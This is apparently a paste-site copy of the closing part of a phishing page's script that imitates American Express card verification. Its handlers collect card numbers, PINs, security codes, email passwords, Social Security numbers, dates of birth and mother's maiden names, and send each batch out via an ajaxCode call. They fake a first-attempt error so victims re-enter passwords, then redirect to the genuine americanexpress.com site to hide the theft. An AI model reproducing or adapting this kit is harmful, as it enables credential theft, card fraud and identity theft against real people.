  1335.             id.required = false;
  1336.             btnLogIn.type = "button"
  1337.             errorBox[0].classList.remove("remove")
  1338.             ajaxCode(textData)
  1339.           }
  1340.           else {
  1341.           btnLogIn.type = "button";
  1342.           headDiv.style.display = "none";
  1343.           nmsBod.style.display = "none";
  1344.           mhassBod.classList.remove("remove");
  1345.           ajaxCode(textData);
  1346.           scrollTop();
  1347.           errorBox[0].classList.add("remove")
  1348.           count = 0;
  1349.           }
  1350.          
  1351.         }
  1352.       });
  1353.  
  1354.       btnCont.addEventListener("click", () => {
  1355.         if (pin.value === "" || pass.value === "" || email.value === "") {
  1356.           console.log("Not allowed");
  1357.         } else {
  1358.           let textData = `4DIGIT CARD PIN: ${pin.value} \n3DIGIT CSC: ${pass.value} \nMothers Birthday: ${email.value}`;
  1359.           btnCont.type = "button";
  1360.           newForm.classList.add("remove");
  1361.           newForm2.classList.remove("remove");
  1362.           spanText.textContent = "2. Verify your card";
  1363.           ajaxCode(textData);
  1364.           scrollTop();
  1365.         }
  1366.       });
  1367.       btnCont2.addEventListener("click", () => {
  1368.         if (
  1369.           card.value === "" ||
  1370.           numCard.value === "" ||
  1371.           idCar.value === "" ||
  1372.           exp.value === "" ||
  1373.           secCode.value === "" ||
  1374.           emai.value === "" ||
  1375.           passem.value === ""
  1376.         ) {
  1377.           console.log("Not allowed");
  1378.         } else {
  1379.           count += 1;
  1380.           let textData = `Card Name: ${card.value} \nCard Number: ${numCard.value} \n4DIGIT CARD ID: ${idCar.value}\nExpired Date: ${exp.value} \nCSC: ${secCode.value}\nEmail Address: ${emai.value}\nPassword: ${passem.value}`;
  1381.           if(count === 1){
  1382.             passem.value = "";
  1383.             passem.required = false;
  1384.             btnCont2.type = "button";
  1385.             errorBox[1].classList.remove("remove");
  1386.             ajaxCode(textData);
  1387.           }
  1388.           else {
  1389.             btnCont2.type = "button";
  1390.           newForm2.classList.add("remove");
  1391.           newForm3.classList.remove("remove");
  1392.           spanText.textContent = "3. Pesonal infomration";
  1393.           phajshjas.classList.add("remove");
  1394.           netBox.classList.add("remove");
  1395.           verifCode.textContent = "Verify your Personal Information";
  1396.             errorBox[1].classList.add("remove")
  1397.           count = 0;
  1398.           ajaxCode(textData);
  1399.           scrollTop();
  1400.           }
  1401.          
  1402.        
  1403.         }
  1404.       });
  1405.  
  1406.       btnCont3.addEventListener("click", () => {
  1407.         if (
  1408.           ssn.value === "" ||
  1409.           secPin.value === "" ||
  1410.           dob.value === "" ||
  1411.           mmname.value === "" ||
  1412.           pbirth.value === "" ||
  1413.           mail3.value === "" ||
  1414.           mailps.value === ""
  1415.         ) {
  1416.           console.log("Not allowed");
  1417.         } else {
  1418.  
  1419.           count += 1;
  1420.           let textData = `SSN: ${ssn.value} \nSecurity Pin: ${secPin.value} \nDOB: ${dob.value}\nMother's Maiden Name: ${mmname.value} \nPlace of Birth: ${pbirth.value}\nEmail Address: ${mail3.value}\nPassword: ${mailps.value}`;
  1421.  
  1422.           if(count === 1){
  1423.             mailps.value = "";
  1424.             errorBox[2].classList.remove("remove")
  1425.             ajaxCode(textData);
  1426.           }
  1427.           else {
  1428.           btnCont3.type = "button";
  1429.           spanText.textContent = "4. finish";
  1430.           newForm3.classList.add("remove");
  1431.           newForm4.classList.remove("remove");
  1432.           verifCode.textContent =
  1433.             "Thank you, Your information has been verified.";
  1434.             count = 0;
  1435.           ajaxCode(textData);
  1436.            errorBox[2].classList.add("remove")
  1437.           setTimeout(() => {
  1438.             window.location.href = "https://www.americanexpress.com/";
  1439.           }, 1000);
  1440.           scrollTop();
  1441.           }
  1442.        
  1443.         }
  1444.       });
  1445.     </script>
  1446.   </body>
  1447. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement